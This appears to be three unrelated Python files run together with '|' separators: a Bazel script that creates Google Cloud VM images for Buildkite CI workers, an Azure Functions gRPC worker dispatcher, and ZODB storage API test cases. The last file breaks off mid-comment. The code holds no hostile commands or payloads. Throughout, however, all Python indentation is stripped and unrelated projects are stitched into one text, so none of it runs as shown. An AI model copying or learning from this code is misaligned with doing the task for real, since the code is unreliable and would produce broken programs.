# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import itertools
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
PROJECT = "bazel-untrusted"
LOCATION = "europe-north1-a"
IMAGE_CREATION_VMS = {
# Find the newest FreeBSD 11 image via:
# gcloud compute images list --project freebsd-org-cloud-dev \
# --no-standard-images
# ('bk-freebsd11',): {
# 'source_image': 'https://www.googleapis.com/compute/v1/projects/freebsd-org-cloud-dev/global/images/freebsd-11-1-stable-amd64-2017-12-28',
# 'scripts': [
# 'setup-freebsd.sh',
# 'install-buildkite-agent.sh'
# ]
# },
("bk-docker",): {
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1804-lts",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
(
"bk-windows-java8",
# 'bk-worker-windows-java9',
# 'bk-worker-windows-java10',
): {
"source_image_project": "windows-cloud",
"source_image_family": "windows-1803-core",
"setup_script": "setup-windows.ps1",
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=PROJECT,
zone=LOCATION,
machine_type="n1-standard-8",
network="buildkite",
metadata_from_file=startup_script,
min_cpu_platform="Intel Skylake",
boot_disk_type="pd-ssd",
boot_disk_size="50GB",
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=PROJECT, zone=LOCATION, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=PROJECT, zone=LOCATION
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=PROJECT,
zone=LOCATION,
start=tail_start,
until="Finished running startup scripts",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(
instance_name, project=PROJECT, zone=LOCATION, status="RUNNING"
)
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=PROJECT, zone=LOCATION, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=PROJECT, zone=LOCATION)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=PROJECT, zone=LOCATION, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=PROJECT,
family=name,
source_disk=instance_name,
source_disk_zone=LOCATION,
licenses=params.get("licenses", []),
)
finally:
gcloud.delete_instance(instance_name, project=PROJECT, zone=LOCATION)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print(
"Usage: create_images.py {}".format(
" ".join(itertools.chain(*IMAGE_CREATION_VMS.keys()))
)
)
return 1
if subprocess.check_output(["git", "status", "--porcelain"], universal_newlines=True).strip():
print(
"There are pending changes in your Git repository. You have to commit "
"them, before create_images.py can continue.",
file=sys.stderr,
)
return 1
# Put VM creation instructions into the work queue.
for names, params in IMAGE_CREATION_VMS.items():
for name in names:
if argv and name not in argv:
continue
WORK_QUEUE.put({"name": name, "params": params})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
dispatcher.py
|
"""GRPC client.
Implements loading and execution of Python workers.
"""
import asyncio
import concurrent.futures
import logging
import queue
import threading
import traceback
import grpc
from . import bindings
from . import functions
from . import loader
from . import protos
from .logging import error_logger, logger
class DispatcherMeta(type):
__current_dispatcher__ = None
@property
def current(mcls):
disp = mcls.__current_dispatcher__
if disp is None:
raise RuntimeError('no currently running Dispatcher is found')
return disp
class Dispatcher(metaclass=DispatcherMeta):
_GRPC_STOP_RESPONSE = object()
def __init__(self, loop, host, port, worker_id, request_id,
grpc_connect_timeout, grpc_max_msg_len):
self._loop = loop
self._host = host
self._port = port
self._request_id = request_id
self._worker_id = worker_id
self._functions = functions.Registry()
# A thread-pool for synchronous function calls. We limit
# the number of threads to 1 so that one Python worker can
# only run one synchronous function in parallel. This is
# because synchronous code in Python is rarely designed with
# concurrency in mind, so we don't want to allow users to
# have races in their synchronous functions. Moreover,
# because of the GIL in CPython, it rarely makes sense to
# use threads (unless the code is IO bound, but we have
# async support for that.)
self._sync_call_tp = concurrent.futures.ThreadPoolExecutor(
max_workers=1)
self._grpc_connect_timeout = grpc_connect_timeout
self._grpc_max_msg_len = grpc_max_msg_len
self._grpc_resp_queue: queue.Queue = queue.Queue()
self._grpc_connected_fut = loop.create_future()
self._grpc_thread = threading.Thread(
name='grpc-thread', target=self.__poll_grpc)
@classmethod
async def connect(cls, host, port, worker_id, request_id,
connect_timeout, max_msg_len=None):
loop = asyncio._get_running_loop()
disp = cls(loop, host, port, worker_id, request_id,
connect_timeout, max_msg_len)
disp._grpc_thread.start()
await disp._grpc_connected_fut
logger.info('Successfully opened gRPC channel to %s:%s', host, port)
return disp
async def dispatch_forever(self):
if DispatcherMeta.__current_dispatcher__ is not None:
raise RuntimeError(
'there can be only one running dispatcher per process')
self._old_task_factory = self._loop.get_task_factory()
loader.install()
DispatcherMeta.__current_dispatcher__ = self
try:
forever = self._loop.create_future()
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
start_stream=protos.StartStream(
worker_id=self.worker_id)))
self._loop.set_task_factory(
lambda loop, coro: ContextEnabledTask(coro, loop=loop))
logging_handler = AsyncLoggingHandler()
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
root_logger.addHandler(logging_handler)
try:
await forever
finally:
root_logger.removeHandler(logging_handler)
finally:
DispatcherMeta.__current_dispatcher__ = None
loader.uninstall()
self._loop.set_task_factory(self._old_task_factory)
self.stop()
def stop(self):
if self._grpc_thread is not None:
self._grpc_resp_queue.put_nowait(self._GRPC_STOP_RESPONSE)
self._grpc_thread.join()
self._grpc_thread = None
if self._sync_call_tp is not None:
self._sync_call_tp.shutdown()
self._sync_call_tp = None
def _on_logging(self, record: logging.LogRecord, formatted_msg: str):
if record.levelno >= logging.CRITICAL:
log_level = protos.RpcLog.Critical
elif record.levelno >= logging.ERROR:
log_level = protos.RpcLog.Error
elif record.levelno >= logging.WARNING:
log_level = protos.RpcLog.Warning
elif record.levelno >= logging.INFO:
log_level = protos.RpcLog.Information
elif record.levelno >= logging.DEBUG:
log_level = protos.RpcLog.Debug
else:
log_level = getattr(protos.RpcLog, 'None')
log = dict(
level=log_level,
message=formatted_msg,
category=record.name,
)
invocation_id = get_current_invocation_id()
if invocation_id is not None:
log['invocation_id'] = invocation_id
# XXX: When an exception field is set in RpcLog, WebHost doesn't
# wait for the call result and simply aborts the execution.
#
# if record.exc_info and record.exc_info[1] is not None:
# log['exception'] = self._serialize_exception(record.exc_info[1])
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
rpc_log=protos.RpcLog(**log)))
@property
def request_id(self):
return self._request_id
@property
def worker_id(self):
return self._worker_id
def _serialize_exception(self, exc):
try:
message = f'{type(exc).__name__}: {exc}'
except Exception:
message = (f'Unhandled exception in function. '
f'Could not serialize original exception message.')
try:
stack_trace = ''.join(traceback.format_tb(exc.__traceback__))
except Exception:
stack_trace = ''
return protos.RpcException(message=message, stack_trace=stack_trace)
async def _dispatch_grpc_request(self, request):
content_type = request.WhichOneof('content')
request_handler = getattr(self, f'_handle__{content_type}', None)
if request_handler is None:
# Don't crash on unknown messages. Some of them can be ignored;
# and if something goes really wrong the host can always just
# kill the worker's process.
logger.error(
f'unknown StreamingMessage content type {content_type}')
return
resp = await request_handler(request)
self._grpc_resp_queue.put_nowait(resp)
async def _handle__worker_init_request(self, req):
logger.info('Received WorkerInitRequest, request ID %s',
self.request_id)
return protos.StreamingMessage(
request_id=self.request_id,
worker_init_response=protos.WorkerInitResponse(
result=protos.StatusResult(
status=protos.StatusResult.Success)))
async def _handle__function_load_request(self, req):
func_request = req.function_load_request
function_id = func_request.function_id
logger.info('Received FunctionLoadRequest, request ID: %s, '
'function ID: %s', self.request_id, function_id)
try:
func = loader.load_function(
func_request.metadata.name,
func_request.metadata.directory,
func_request.metadata.script_file,
func_request.metadata.entry_point)
self._functions.add_function(
function_id, func, func_request.metadata)
logger.info('Successfully processed FunctionLoadRequest, '
'request ID: %s, function ID: %s',
self.request_id, function_id)
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Success)))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
async def _handle__invocation_request(self, req):
invoc_request = req.invocation_request
invocation_id = invoc_request.invocation_id
function_id = invoc_request.function_id
# Set the current `invocation_id` to the current task so
# that our logging handler can find it.
current_task = asyncio.Task.current_task(self._loop)
assert isinstance(current_task, ContextEnabledTask)
current_task.set_azure_invocation_id(invocation_id)
logger.info('Received FunctionInvocationRequest, request ID: %s, '
'function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
try:
fi: functions.FunctionInfo = self._functions.get_function(
function_id)
args = {}
for pb in invoc_request.input_data:
pb_type_info = fi.input_types[pb.name]
if bindings.is_trigger_binding(pb_type_info.binding_name):
trigger_metadata = invoc_request.trigger_metadata
else:
trigger_metadata = None
args[pb.name] = bindings.from_incoming_proto(
pb_type_info.binding_name, pb.data,
trigger_metadata=trigger_metadata,
pytype=pb_type_info.pytype)
if fi.requires_context:
args['context'] = bindings.Context(
fi.name, fi.directory, invocation_id)
if fi.output_types:
for name in fi.output_types:
args[name] = bindings.Out()
if fi.is_async:
call_result = await fi.func(**args)
else:
call_result = await self._loop.run_in_executor(
self._sync_call_tp,
self.__run_sync_func, invocation_id, fi.func, args)
if call_result is not None and not fi.has_return:
raise RuntimeError(
f'function {fi.name!r} without a $return binding '
f'returned a non-None value')
output_data = []
if fi.output_types:
for out_name, out_type_info in fi.output_types.items():
val = args[name].get()
if val is None:
# TODO: is the "Out" parameter optional?
# Can "None" be marshaled into protos.TypedData?
continue
rpc_val = bindings.to_outgoing_proto(
out_type_info.binding_name, val,
pytype=out_type_info.pytype)
assert rpc_val is not None
output_data.append(
protos.ParameterBinding(
name=name,
data=rpc_val))
return_value = None
if fi.return_type is not None:
return_value = bindings.to_outgoing_proto(
fi.return_type.binding_name, call_result,
pytype=fi.return_type.pytype)
logger.info('Successfully processed FunctionInvocationRequest, '
'request ID: %s, function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
return_value=return_value,
result=protos.StatusResult(
status=protos.StatusResult.Success),
output_data=output_data))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
def __run_sync_func(self, invocation_id, func, params):
# This helper exists because we need to access the current
# invocation_id from ThreadPoolExecutor's threads.
_invocation_id_local.v = invocation_id
try:
return func(**params)
finally:
_invocation_id_local.v = None
def __poll_grpc(self):
options = []
if self._grpc_max_msg_len:
options.append(('grpc.max_receive_message_length',
self._grpc_max_msg_len))
options.append(('grpc.max_send_message_length',
self._grpc_max_msg_len))
channel = grpc.insecure_channel(
f'{self._host}:{self._port}', options)
try:
grpc.channel_ready_future(channel).result(
timeout=self._grpc_connect_timeout)
except Exception as ex:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_exception, ex)
return
else:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_result, True)
stub = protos.FunctionRpcStub(channel)
def gen(resp_queue):
while True:
msg = resp_queue.get()
if msg is self._GRPC_STOP_RESPONSE:
grpc_req_stream.cancel()
return
yield msg
grpc_req_stream = stub.EventStream(gen(self._grpc_resp_queue))
try:
for req in grpc_req_stream:
self._loop.call_soon_threadsafe(
self._loop.create_task, self._dispatch_grpc_request(req))
except Exception as ex:
if ex is grpc_req_stream:
# Yes, this is how grpc_req_stream iterator exits.
return
error_logger.exception('unhandled error in gRPC thread')
raise
class AsyncLoggingHandler(logging.Handler):
def emit(self, record):
if not record.name.startswith('azure.functions_worker'):
# Skip worker system logs
msg = self.format(record)
Dispatcher.current._on_logging(record, msg)
class ContextEnabledTask(asyncio.Task):
_AZURE_INVOCATION_ID = '__azure_function_invocation_id__'
def __init__(self, coro, loop):
super().__init__(coro, loop=loop)
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
invocation_id = getattr(
current_task, self._AZURE_INVOCATION_ID, None)
if invocation_id is not None:
self.set_azure_invocation_id(invocation_id)
def set_azure_invocation_id(self, invocation_id):
setattr(self, self._AZURE_INVOCATION_ID, invocation_id)
def get_current_invocation_id():
loop = asyncio._get_running_loop()
if loop is not None:
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
return getattr(
current_task, ContextEnabledTask._AZURE_INVOCATION_ID, None)
return getattr(_invocation_id_local, 'v', None)
_invocation_id_local = threading.local()
|
BasicStorage.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Run the basic tests for a storage as described in the official storage API
The most complete and most out-of-date description of the interface is:
http://www.zope.org/Documentation/Developer/Models/ZODB/ZODB_Architecture_Storage_Interface_Info.html
All storages should be able to pass these tests.
"""
import transaction
from ZODB import DB, POSException
from ZODB.Connection import TransactionMetaData
from ZODB.tests.MinPO import MinPO
from ZODB.tests.StorageTestBase import zodb_unpickle, zodb_pickle
from ZODB.tests.StorageTestBase import ZERO
from ZODB.tests.util import with_high_concurrency
import threading
import time
import zope.interface
import zope.interface.verify
from random import randint
from .. import utils
class BasicStorage(object):
def checkBasics(self):
self.assertEqual(self._storage.lastTransaction(), ZERO)
t = TransactionMetaData()
self._storage.tpc_begin(t)
self.assertRaises(POSException.StorageTransactionError,
self._storage.tpc_begin, t)
# Aborting is easy
self._storage.tpc_abort(t)
# Test a few expected exceptions when we're doing operations giving a
# different Transaction object than the one we've begun on.
self._storage.tpc_begin(t)
self.assertRaises(
POSException.StorageTransactionError,
self._storage.store,
ZERO, ZERO, b'', '', TransactionMetaData())
self.assertRaises(
POSException.StorageTransactionError,
self._storage.store,
ZERO, 1, b'2', '', TransactionMetaData())
self.assertRaises(
POSException.StorageTransactionError,
self._storage.tpc_vote, TransactionMetaData())
self._storage.tpc_abort(t)
def checkSerialIsNoneForInitialRevision(self):
eq = self.assertEqual
oid = self._storage.new_oid()
txn = TransactionMetaData()
self._storage.tpc_begin(txn)
# Use None for serial. Don't use _dostore() here because that coerces
# serial=None to serial=ZERO.
self._storage.store(oid, None, zodb_pickle(MinPO(11)),
'', txn)
self._storage.tpc_vote(txn)
newrevid = self._storage.tpc_finish(txn)
data, revid = utils.load_current(self._storage, oid)
value = zodb_unpickle(data)
eq(value, MinPO(11))
eq(revid, newrevid)
def checkStore(self):
revid = ZERO
newrevid = self._dostore(revid=None)
# Finish the transaction.
self.assertNotEqual(newrevid, revid)
def checkStoreAndLoad(self):
eq = self.assertEqual
oid = self._storage.new_oid()
self._dostore(oid=oid, data=MinPO(7))
data, revid = utils.load_current(self._storage, oid)
value = zodb_unpickle(data)
eq(value, MinPO(7))
# Now do a bunch of updates to an object
for i in range(13, 22):
revid = self._dostore(oid, revid=revid, data=MinPO(i))
# Now get the latest revision of the object
data, revid = utils.load_current(self._storage, oid)
eq(zodb_unpickle(data), MinPO(21))
def checkConflicts(self):
oid = self._storage.new_oid()
revid1 = self._dostore(oid, data=MinPO(11))
self._dostore(oid, revid=revid1, data=MinPO(12))
self.assertRaises(POSException.ConflictError,
self._dostore,
oid, revid=revid1, data=MinPO(13))
def checkWriteAfterAbort(self):
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
# Now abort this transaction
self._storage.tpc_abort(t)
# Now start all over again
oid = self._storage.new_oid()
self._dostore(oid=oid, data=MinPO(6))
def checkAbortAfterVote(self):
oid1 = self._storage.new_oid()
revid1 = self._dostore(oid=oid1, data=MinPO(-2))
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
# Now abort this transaction
self._storage.tpc_vote(t)
self._storage.tpc_abort(t)
# Now start all over again
oid = self._storage.new_oid()
revid = self._dostore(oid=oid, data=MinPO(6))
for oid, revid in [(oid1, revid1), (oid, revid)]:
data, _revid = utils.load_current(self._storage, oid)
self.assertEqual(revid, _revid)
def checkStoreTwoObjects(self):
noteq = self.assertNotEqual
p31, p32, p51, p52 = map(MinPO, (31, 32, 51, 52))
oid1 = self._storage.new_oid()
oid2 = self._storage.new_oid()
noteq(oid1, oid2)
revid1 = self._dostore(oid1, data=p31)
revid2 = self._dostore(oid2, data=p51)
noteq(revid1, revid2)
revid3 = self._dostore(oid1, revid=revid1, data=p32)
revid4 = self._dostore(oid2, revid=revid2, data=p52)
noteq(revid3, revid4)
def checkGetTid(self):
if not hasattr(self._storage, 'getTid'):
return
eq = self.assertEqual
p41, p42 = map(MinPO, (41, 42))
oid = self._storage.new_oid()
self.assertRaises(KeyError, self._storage.getTid, oid)
# Now store a revision
revid1 = self._dostore(oid, data=p41)
eq(revid1, self._storage.getTid(oid))
# And another one
revid2 = self._dostore(oid, revid=revid1, data=p42)
eq(revid2, self._storage.getTid(oid))
def checkLen(self):
# len(storage) reports the number of objects.
# check it is zero when empty
self.assertEqual(len(self._storage),0)
# check it is correct when the storage contains two object.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=MinPO(22))
self._dostore(data=MinPO(23))
self.assertTrue(len(self._storage) in [0,2])
def checkGetSize(self):
self._dostore(data=MinPO(25))
size = self._storage.getSize()
# The storage API doesn't make any claims about what size
# means except that it ought to be printable.
str(size)
def checkNote(self):
oid = self._storage.new_oid()
t = TransactionMetaData()
self._storage.tpc_begin(t)
t.note(u'this is a test')
self._storage.store(oid, ZERO, zodb_pickle(MinPO(5)), '', t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
def checkInterfaces(self):
for iface in zope.interface.providedBy(self._storage):
zope.interface.verify.verifyObject(iface, self._storage)
def checkMultipleEmptyTransactions(self):
# There was a bug in handling empty transactions in mapping
# storage that caused the commit lock not to be released. :(
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
t = TransactionMetaData()
self._storage.tpc_begin(t) # Hung here before
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
def _do_store_in_separate_thread(self, oid, revid, voted):
# We'll run the competing trans in a separate thread:
thread = threading.Thread(name='T2',
target=self._dostore, args=(oid,), kwargs=dict(revid=revid))
thread.daemon = True
thread.start()
thread.join(.1)
return thread
def check_checkCurrentSerialInTransaction(self):
oid = b'\0\0\0\0\0\0\0\xf0'
tid = self._dostore(oid)
tid2 = self._dostore(oid, revid=tid)
data = b'cpersistent\nPersistent\nq\x01.N.' # a simple persistent obj
#----------------------------------------------------------------------
# stale read
t = TransactionMetaData()
self._storage.tpc_begin(t)
try:
self._storage.store(b'\0\0\0\0\0\0\0\xf1',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid, t)
self._storage.tpc_vote(t)
except POSException.ReadConflictError as v:
self.assertEqual(v.oid, oid)
self.assertEqual(v.serials, (tid2, tid))
else:
if 0: self.assertTrue(False, "No conflict error")
self._storage.tpc_abort(t)
#----------------------------------------------------------------------
# non-stale read, no stress. :)
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf2',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid2, t)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
#----------------------------------------------------------------------
# non-stale read, competition after vote. The competing
# transaction must produce a tid > this transaction's tid
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf3',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid2, t)
self._storage.tpc_vote(t)
# We'll run the competing trans in a separate thread:
thread = self._do_store_in_separate_thread(oid, tid2, True)
self._storage.tpc_finish(t)
thread.join(33)
tid3 = utils.load_current(self._storage, oid)[1]
self.assertTrue(tid3 >
utils.load_current(
self._storage, b'\0\0\0\0\0\0\0\xf3')[1])
#----------------------------------------------------------------------
# non-stale competing trans after checkCurrentSerialInTransaction
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(b'\0\0\0\0\0\0\0\xf4',
b'\0\0\0\0\0\0\0\0', data, '', t)
self._storage.checkCurrentSerialInTransaction(oid, tid3, t)
thread = self._do_store_in_separate_thread(oid, tid3, False)
# There are 2 possibilities:
# 1. The store happens before this transaction completes,
# in which case, the vote below fails.
# 2. The store happens after this trans, in which case, the
# tid of the object is greater than this transaction's tid.
try:
self._storage.tpc_vote(t)
except POSException.ReadConflictError:
thread.join() # OK :)
else:
self._storage.tpc_finish(t)
thread.join()
tid4 = utils.load_current(self._storage, oid)[1]
self.assertTrue(
tid4 >
utils.load_current(self._storage, b'\0\0\0\0\0\0\0\xf4')[1])
def check_tid_ordering_w_commit(self):
# It's important that storages always give a consistent
# ordering for revisions, tids. This is most likely to fail
# around commit. Here we'll do some basic tests to check this.
# We'll use threads to arrange for ordering to go wrong and
# verify that a storage gets it right.
# First, some initial data.
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(ZERO, ZERO, b'x', '', t)
self._storage.tpc_vote(t)
tids = []
self._storage.tpc_finish(t, lambda tid: tids.append(tid))
# OK, now we'll start a new transaction, take it to finish,
# and then block finish while we do some other operations.
t = TransactionMetaData()
self._storage.tpc_begin(t)
self._storage.store(ZERO, tids[0], b'y', '', t)
self._storage.tpc_vote(t)
to_join = []
def run_in_thread(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
to_join.append(t)
started = threading.Event()
finish = threading.Event()
@run_in_thread
def commit():
def callback(tid):
started.set()
tids.append(tid)
finish.wait()
self._storage.tpc_finish(t, callback)
results = {}
started.wait()
attempts = []
attempts_cond = utils.Condition()
def update_attempts():
with attempts_cond:
attempts.append(1)
attempts_cond.notify_all()
@run_in_thread
def load():
update_attempts()
results['load'] = utils.load_current(self._storage, ZERO)[1]
results['lastTransaction'] = self._storage.lastTransaction()
expected_attempts = 1
if hasattr(self._storage, 'getTid'):
expected_attempts += 1
@run_in_thread
def getTid():
update_attempts()
results['getTid'] = self._storage.getTid(ZERO)
if hasattr(self._storage, 'lastInvalidations'):
expected_attempts += 1
@run_in_thread
def lastInvalidations():
update_attempts()
invals = self._storage.lastInvalidations(1)
if invals:
results['lastInvalidations'] = invals[0][0]
with attempts_cond:
while len(attempts) < expected_attempts:
attempts_cond.wait()
time.sleep(.01) # for good measure :)
finish.set()
for t in to_join:
t.join(1)
self.assertEqual(results.pop('load'), tids[1])
self.assertEqual(results.pop('lastTransaction'), tids[1])
for m, tid in results.items():
self.assertEqual(tid, tids[1])
# verify storage/Connection for race in between load/open and local invalidations.
# https://github.com/zopefoundation/ZEO/issues/166
# https://github.com/zopefoundation/ZODB/issues/290
@with_high_concurrency
def check_race_loadopen_vs_local_invalidate(self):
db = DB(self._storage)
# init initializes the database with two integer objects - obj1/obj2
# that are set to 0.
def init():
transaction.begin()
zconn = db.open()
root = zconn.root()
root['obj1'] = MinPO(0)
root['obj2'] = MinPO(0)
transaction.commit()
zconn.close()
# verify accesses obj1/obj2 and verifies that obj1.value == obj2.value
#
# access to obj1 is organized to always trigger loading from zstor.
# access to obj2 goes through zconn cache and so verifies whether the
# cache is not stale.
failed = threading.Event()
failure = [None]
def verify():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
# obj1 - reload it from zstor
# obj2 - get it from zconn cache
obj1._p_invalidate()
# both objects must have the same values
v1 = obj1.value
v2 = obj2.value
if v1 != v2:
failure[0] = "verify: obj1.value (%d) != obj2.value (%d)" % (v1, v2)
failed.set()
transaction.abort() # we did not changed anything; also fails with commit
zconn.close()
# modify changes obj1/obj2 by doing `objX.value += 1`.
#
# Since both objects start from 0, the invariant that
# `obj1.value == obj2.value` is always preserved.
def modify():
transaction.begin()
zconn = db.open()
root = zconn.root()
obj1 = root['obj1']
obj2 = root['obj2']
obj1.value += 1
obj2.value += 1
assert obj1.value == obj2.value
transaction.commit()
zconn.close()
# xrun runs f in a loop until either N iterations, or until failed is set.
def xrun(f, N):
try:
for i in range(N):
#print('%s.%d' % (f.__name__, i))
f()
if failed.is_set():
break
except:
failed.set()
raise
# loop verify and modify concurrently.
init()
N = 500
tverify = threading.Thread(name='Tverify', target=xrun, args=(verify, N))
tmodify = threading.Thread(name='Tmodify', target=xrun, args=(modify, N))
tverify.start()
tmodify.start()
tverify.join(60)
tmodify.join(60)
if failed.is_set():
self.fail(failure[0])
# client-server storages like ZEO, NEO and RelStorage allow several storage
# clients to be connected to single storage server.
#
# For client-server storages test subclasses should implement
# _new_storage_client to return new storage client that is connected to the
# same storage server self._storage is connected to.
def _new_storage_client(self):
raise NotImplementedError
# verify storage for race in between load and external invalidations.
# https://github.com/zopefoundation/ZEO/issues/155
#
# This test is similar to check_race_loadopen_vs_local_invalidate but does
# not reuse its code because the probability to reproduce external
# invalidation bug with only 1 mutator + 1 verifier is low.
@with_high_concurrency
def check_race_load_vs_external_invalidate(self):
# dbopen creates new client storage connection and wraps it with DB.
def dbopen():
try:
zstor = self._new_storage_client()
except NotImplementedError:
# the test will be skipped from main thread because dbopen is
# first used in init on the main thread before any other thread
# is spawned.
self.skipTest("%s does not implement _new_storage_client" % type(self))
return DB(zstor)
# init initializes the database with two integer objects - obj1/obj2 that are set to 0.
def init():
db = dbopen()
transaction.begin()
zconn = db.open()
root = zconn.root()
root['obj1'] = MinPO(0)
root['obj2'] = MinPO(0)
transaction.commit()
zconn.close()
db.close()
# we'll run 8 T workers concurrently. As of 20210416, due to race conditions
# in ZEO, it triggers the bug where T sees stale obj2 with obj1.value != obj2.value
#
# The probability to reproduce the bug is significantly reduced with
# decreasing n(workers): almost never with nwork=2 and sometimes with nwork=4.
nwork = 8
# T is a worker that accesses obj1/obj2 in a loop and verifies
# `obj1.value == obj2.value` invariant.
#
# access to obj1 is organized to always trigger loading from zstor.
# access to obj2 goes through zconn cache and so verifies whether the cache is not stale.
#
# Once in a while T tries to modify obj{1,2}.value maintaining the invariant as
